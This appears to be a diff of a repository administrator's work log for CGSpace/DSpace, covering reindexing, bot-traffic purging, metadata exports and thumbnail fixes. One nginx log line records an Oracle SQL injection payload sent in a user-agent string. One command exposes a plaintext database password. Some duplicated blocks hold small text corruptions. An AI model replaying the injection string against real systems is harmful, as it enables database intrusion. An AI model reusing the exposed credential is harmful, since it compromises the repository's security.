<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real 275m15.777s
</span></span><span style="display:flex;"><span>user 182m52.171s
</span></span><span style="display:flex;"><span>sys 2m51.573s
</span></span></code></pre></div><ul>
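<li>(The <code>chrt -b 0 ionice -c2 -n7 nice -n19</code> prefix runs the indexer with batch CPU scheduling, the lowest best-effort I/O priority, and the lowest CPU priority, so the four-and-a-half-hour reindex doesn&rsquo;t starve Tomcat)</li>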
<li>I got a request to confirm validation of CGSpace on openarchives.org, with the requestor&rsquo;s IP being 128.84.116.66
<ul>
<li>That is at Cornell&hellip; hmmmm who could that be?!</li>
@ -192,8 +192,8 @@ sys 2m51.573s
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] &#34;GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1&#34; 200 1157807 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf&#34; &#34;Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917&#34;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>45.134.26.171 - - [12/Jan/2022:06:25:27 +0100] &#34;GET /bitstream/handle/10568/81964/varietal-2faea58f.pdf?sequence=1 HTTP/1.1&#34; 200 1157807 &#34;https://cgspace.cgiar.org:443/bitstream/handle/10568/81964/varietal-2faea58f.pdf&#34; &#34;Opera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1)) AND 4734=CTXSYS.DRITHSX.SN(4734,(CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113)||(SELECT (CASE WHEN (4734=4734) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113))) AND ((3917=3917&#34;
</span></span></code></pre></div><ul>
<li>3.225.28.105 made 3,000 requests mostly for one CIAT collection on the REST API and it is owned by Amazon
<ul>
<li>The user agent is sometimes a normal user one, and sometimes <code>Apache-HttpClient/4.3.4 (java 1.5)</code></li>
@ -202,27 +202,27 @@ sys 2m51.573s
<li>217.182.21.193 made 2,400 requests and is on OVH</li>
<li>I purged these hits</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
Purging 26817 hits from 64.39.98.40 in statistics
Purging 9446 hits from 45.134.26.171 in statistics
Purging 6490 hits from 3.225.28.105 in statistics
Purging 11949 hits from 217.182.21.193 in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 54702
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
</span></span><span style="display:flex;"><span>Purging 26817 hits from 64.39.98.40 in statistics
</span></span><span style="display:flex;"><span>Purging 9446 hits from 45.134.26.171 in statistics
</span></span><span style="display:flex;"><span>Purging 6490 hits from 3.225.28.105 in statistics
</span></span><span style="display:flex;"><span>Purging 11949 hits from 217.182.21.193 in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 54702
</span></span></code></pre></div><ul>
<li>Export donors and affiliations from CGSpace database:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
COPY 1036
localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
COPY 7901
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.donor&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 248 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-donors.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 1036
</span></span><span style="display:flex;"><span>localhost/dspace63= ☘ \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2022-02-02-affiliations.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 7901
</span></span></code></pre></div><ul>
<li>Then check matches against the latest ROR dump:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> &gt; /tmp/2022-02-02-donors.txt
$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
...
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c cg.contributor.donor /tmp/2022-02-02-donors.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> &gt; /tmp/2022-02-02-donors.txt
</span></span><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json -o /tmp/donor-ror-matches.csv
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><ul>
<li>I see we have 258/1036 (24.9%) of our donors matching ROR (as of the 2021-09-23 ROR dump)</li>
<li>I see we have 1986/7901 (25.1%) of our affiliations matching ROR (as of the 2021-09-23 ROR dump; a quick peek at the dump itself is sketched below)</li>
<li>Update the PostgreSQL JDBC driver to 42.3.2 in the Ansible Infrastructure playbooks and deploy on DSpace Test</li>
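</ul>
<ul>
<li>For reference, the ROR data dump is one big JSON array of organization records; a quick jq peek at the fields a name match would typically use (field names per the ROR v1 schema):</li>
</ul>
<pre tabindex="0"><code>$ jq -r &#39;.[] | .name&#39; 2021-09-23-ror-data.json | head
$ jq -r &#39;.[] | .aliases[]?&#39; 2021-09-23-ror-data.json | head
</code></pre><ul>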
@ -245,37 +245,37 @@ $ ./ilri/ror-lookup.py -i /tmp/2022-02-02-donors.txt -r 2021-09-23-ror-data.json
<li>I synchronized DSpace Test with a fresh snapshot of CGSpace</li>
<li>I noticed a bunch of thumbnails missing for items submitted in the last week on CGSpace so I ran the <code>dspace filter-media</code> script manually and eventually it crashed:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media
...
SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.txt&#39; already exists
Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.jpg&#39; already exists
File: Agreement_on_the_Estab_of_ILRI.doc.txt
Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
at org.textmining.extraction.word.model.FormattedDiskPage.&lt;init&gt;(FormattedDiskPage.java:66)
at org.textmining.extraction.word.model.CHPFormattedDiskPage.&lt;init&gt;(CHPFormattedDiskPage.java:62)
at org.textmining.extraction.word.model.CHPBinTable.&lt;init&gt;(CHPBinTable.java:70)
at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.txt&#39; already exists
</span></span><span style="display:flex;"><span>Generated Thumbnail ilri_establishiment.pdf matches pattern and is replacable.
</span></span><span style="display:flex;"><span>SKIPPED: bitstream 48612de7-eec5-4990-8f1b-589a87219a39 (item: 10568/67391) because &#39;ilri_establishiment.pdf.jpg&#39; already exists
</span></span><span style="display:flex;"><span>File: Agreement_on_the_Estab_of_ILRI.doc.txt
</span></span><span style="display:flex;"><span>Exception: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
</span></span><span style="display:flex;"><span>java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([BI)I
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.model.FormattedDiskPage.&lt;init&gt;(FormattedDiskPage.java:66)
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.model.CHPFormattedDiskPage.&lt;init&gt;(CHPFormattedDiskPage.java:62)
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.model.CHPBinTable.&lt;init&gt;(CHPBinTable.java:70)
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:122)
</span></span><span style="display:flex;"><span> at org.textmining.extraction.word.Word97TextExtractor.getText(Word97TextExtractor.java:63)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.WordFilter.getDestinationStream(WordFilter.java:83)
</span></span><span style="display:flex;"><span> at com.atmire.dspace.app.mediafilter.AtmireMediaFilter.processBitstream(AtmireMediaFilter.java:103)
</span></span><span style="display:flex;"><span> at com.atmire.dspace.app.mediafilter.AtmireMediaFilterServiceImpl.filterBitstream(AtmireMediaFilterServiceImpl.java:61)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.MediaFilterServiceImpl.filterItem(MediaFilterServiceImpl.java:181)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersItem(MediaFilterServiceImpl.java:159)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.MediaFilterServiceImpl.applyFiltersAllItems(MediaFilterServiceImpl.java:111)
</span></span><span style="display:flex;"><span> at org.dspace.app.mediafilter.MediaFilterCLITool.main(MediaFilterCLITool.java:212)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
</span></span><span style="display:flex;"><span> at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
</span></span><span style="display:flex;"><span> at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
</span></span><span style="display:flex;"><span> at java.lang.reflect.Method.invoke(Method.java:498)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
</span></span><span style="display:flex;"><span> at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
</span></span></code></pre></div><ul>
<li>I should look up that issue and perhaps report a bug somewhere, but for now I just forced the JPG thumbnails with:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -v &gt;&amp; /tmp/filter-media.log
</code></pre></div><h2 id="2022-02-04">2022-02-04</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -p <span style="color:#e6db74">&#34;ImageMagick PDF Thumbnail&#34;</span> -v &gt;&amp; /tmp/filter-media.log
</span></span></code></pre></div><h2 id="2022-02-04">2022-02-04</h2>
<ul>
<li>I found a thread on the dspace-tech mailing list about the <code>media-filter</code> crash above (the relevant <code>dspace.cfg</code> mapping is sketched after this list)
<ul>
@ -284,14 +284,14 @@ java.lang.NoSuchMethodError: org.apache.poi.util.LittleEndian.getUnsignedByte([B
</ul>
</li>
</ul>
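<ul>
<li>For reference, pointing the &ldquo;Word Text Extractor&rdquo; name at the POI-based filter is a <code>dspace.cfg</code> change along these lines (an illustrative snippet; the real named-plugin list carries many more entries):</li>
</ul>
<pre tabindex="0"><code>plugin.named.org.dspace.app.mediafilter.FormatFilter = \
  org.dspace.app.mediafilter.PoiWordFilter = Word Text Extractor, \
  ...
</code></pre>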
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -i 10568/67391 -p <span style="color:#e6db74">&#34;Word Text Extractor&#34;</span> -v
The following MediaFilters are enabled:
Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
org.dspace.app.mediafilter.PoiWordFilter
File: Agreement_on_the_Estab_of_ILRI.doc.txt
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created &#39;Agreement_on_the_Estab_of_ILRI.doc.txt&#39;
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace filter-media -i 10568/67391 -p <span style="color:#e6db74">&#34;Word Text Extractor&#34;</span> -v
</span></span><span style="display:flex;"><span>The following MediaFilters are enabled:
</span></span><span style="display:flex;"><span>Full Filter Name: org.dspace.app.mediafilter.PoiWordFilter
</span></span><span style="display:flex;"><span>org.dspace.app.mediafilter.PoiWordFilter
</span></span><span style="display:flex;"><span>File: Agreement_on_the_Estab_of_ILRI.doc.txt
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>FILTERED: bitstream 31db7d05-5369-4309-adeb-3b888c80b73d (item: 10568/67391) and created &#39;Agreement_on_the_Estab_of_ILRI.doc.txt&#39;
</span></span></code></pre></div><ul>
<li>Meeting with the repositories working group to discuss issues moving forward in the One CGIAR</li>
</ul>
<h2 id="2022-02-07">2022-02-07</h2>
@ -302,20 +302,20 @@ File: Agreement_on_the_Estab_of_ILRI.doc.txt
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">or(
isNotNull(value.match(&#39;1&#39;)),
isNotNull(value.match(&#39;4&#39;)),
isNotNull(value.match(&#39;5&#39;)),
isNotNull(value.match(&#39;6&#39;)),
isNotNull(value.match(&#39;8&#39;)),
...
isNotNull(value.match(&#39;178&#39;)),
isNotNull(value.match(&#39;186&#39;)),
isNotNull(value.match(&#39;188&#39;)),
isNotNull(value.match(&#39;189&#39;)),
isNotNull(value.match(&#39;197&#39;))
)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;1&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;4&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;5&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;6&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;8&#39;)),
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>sNotNull(value.match(&#39;178&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;186&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;188&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;189&#39;)),
</span></span><span style="display:flex;"><span>isNotNull(value.match(&#39;197&#39;))
</span></span><span style="display:flex;"><span>)
</span></span></code></pre></div><ul>
<li>Then I flagged all of these (seventy-five items)&hellip;
<ul>
<li>I decided to flag the deletes instead of starring the keeps because there are some items in the original file that were not marked as duplicates, so we have to keep those too</li>
@ -323,19 +323,19 @@ isNotNull(value.match(&#39;197&#39;))
</li>
<li>I generated the next batch of 200 items, from IDs 201 to 400, checked them for duplicates, and then added the PDF file names to the CSV for reference:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/tac.csv
$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/2022-02-07-tac-batch2-201-400.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/batch2-filenames.csv
$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv &gt; /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/tac.csv
</span></span><span style="display:flex;"><span>$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span> -o /tmp/2022-02-07-tac-batch2-201-400.csv
</span></span><span style="display:flex;"><span>$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch201-400.csv &gt; /tmp/batch2-filenames.csv
</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv &gt; /tmp/2022-02-07-tac-batch2-201-400-filenames.csv
</span></span></code></pre></div><ul>
<li>Then I sent this second batch of items to Gaia to look at</li>
</ul>
<h2 id="2022-02-08">2022-02-08</h2>
<ul>
<li>Create a SAF archive for the first 200 items (IDs 1 to 200) that were <em>not</em> flagged as duplicates and upload them to a <a href="https://dspacetest.cgiar.org/handle/10568/117921">new collection on DSpace Test</a>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-08-tac-batch1-1to200.map
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>bngo@mfin.com --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-02-08-tac-batch1-1to200.map
</span></span></code></pre></div><ul>
<li>Fix some occurrences of &ldquo;Hammond, Jim&rdquo; to be &ldquo;Hammond, James&rdquo; on CGSpace (one way to do that in SQL is sketched below)</li>
<li>Start a full index on AReS</li>
</ul>
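<ul>
<li>A sketch of that kind of author fix in SQL, assuming the stock DSpace registry where <code>dc.contributor.author</code> is <code>metadata_field_id=3</code> (worth verifying the id first):</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT metadata_field_id FROM metadatafieldregistry WHERE element=&#39;contributor&#39; AND qualifier=&#39;author&#39;;
dspace=# UPDATE metadatavalue SET text_value=&#39;Hammond, James&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=3 AND text_value=&#39;Hammond, Jim&#39;;
</code></pre>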
@ -355,12 +355,12 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
<ul>
<li>I extract the logs from nginx for yesterday so I can analyze the traffic:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console"># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-access.log
# zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-rest.log
# awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /tmp/feb9-* | less | sort -u &gt; /tmp/feb9-ips.txt
# wc -l /tmp/feb9-ips.txt
11636 /tmp/feb9-ips.txt
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># zcat --force /var/log/nginx/access.log.1 /var/log/nginx/access.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-access.log
</span></span><span style="display:flex;"><span># zcat --force /var/log/nginx/rest.log.1 /var/log/nginx/rest.log.2.gz | grep <span style="color:#e6db74">&#39;09/Feb/2022&#39;</span> &gt; /tmp/feb9-rest.log
</span></span><span style="display:flex;"><span># awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> /tmp/feb9-* | less | sort -u &gt; /tmp/feb9-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/feb9-ips.txt
</span></span><span style="display:flex;"><span>11636 /tmp/feb9-ips.tx
</span></span></code></pre></div>
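<ul>
<li>As an aside, a single suspicious address can be spot-checked against a local MaxMind ASN database with libmaxminddb&rsquo;s <code>mmdblookup</code> (assuming a downloaded GeoLite2-ASN.mmdb; the IP is just an example from above):</li>
</ul>
<pre tabindex="0"><code>$ mmdblookup --file GeoLite2-ASN.mmdb --ip 3.225.28.105 autonomous_system_organization
</code></pre><ul>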
<li>I started resolving them with my <code>resolve-addresses-geoip2.py</code> script</li>
<li>In the meantime I am looking at the requests, and I see a new user agent: <code>1science Resolver 1.0.0</code>
<ul>
@ -374,52 +374,52 @@ $ csvjoin -c id /tmp/2022-02-07-tac-batch2-201-400.csv /tmp/batch2-filenames.csv
</li>
<li>Looking at the top twenty or so ASNs for the resolved IPs I see lots of bot traffic, but nothing malicious:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
79 24940
89 36908
100 9299
107 2635
110 44546
111 16509
118 7552
120 4837
123 50245
123 55836
147 45899
173 33771
192 39832
202 32934
235 29465
260 15169
466 14618
607 24757
768 714
1214 8075
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c asn /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
</span></span><span style="display:flex;"><span> 79 24940
</span></span><span style="display:flex;"><span> 89 36908
</span></span><span style="display:flex;"><span> 100 9299
</span></span><span style="display:flex;"><span> 107 2635
</span></span><span style="display:flex;"><span> 110 44546
</span></span><span style="display:flex;"><span> 111 16509
</span></span><span style="display:flex;"><span> 118 7552
</span></span><span style="display:flex;"><span> 120 4837
</span></span><span style="display:flex;"><span> 123 50245
</span></span><span style="display:flex;"><span> 123 55836
</span></span><span style="display:flex;"><span> 147 45899
</span></span><span style="display:flex;"><span> 173 33771
</span></span><span style="display:flex;"><span> 192 39832
</span></span><span style="display:flex;"><span> 202 32934
</span></span><span style="display:flex;"><span> 235 29465
</span></span><span style="display:flex;"><span> 260 15169
</span></span><span style="display:flex;"><span> 466 14618
</span></span><span style="display:flex;"><span> 607 24757
</span></span><span style="display:flex;"><span> 768 714
</span></span><span style="display:flex;"><span> 1214 8075
</span></span></code></pre></div><ul>
<li>The same information, but by org name:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ csvcut -c org /tmp/feb9-ips.csv | sort | uniq -c | sort -h | tail -n <span style="color:#ae81ff">20</span>
92 Orange
100 Hetzner Online GmbH
100 Philippine Long Distance Telephone Company
107 AUTOMATTIC
110 ALFA TELECOM s.r.o.
111 AMAZON-02
118 Viettel Group
120 CHINA UNICOM China169 Backbone
123 Reliance Jio Infocomm Limited
123 Serverel Inc.
147 VNPT Corp
173 SAFARICOM-LIMITED
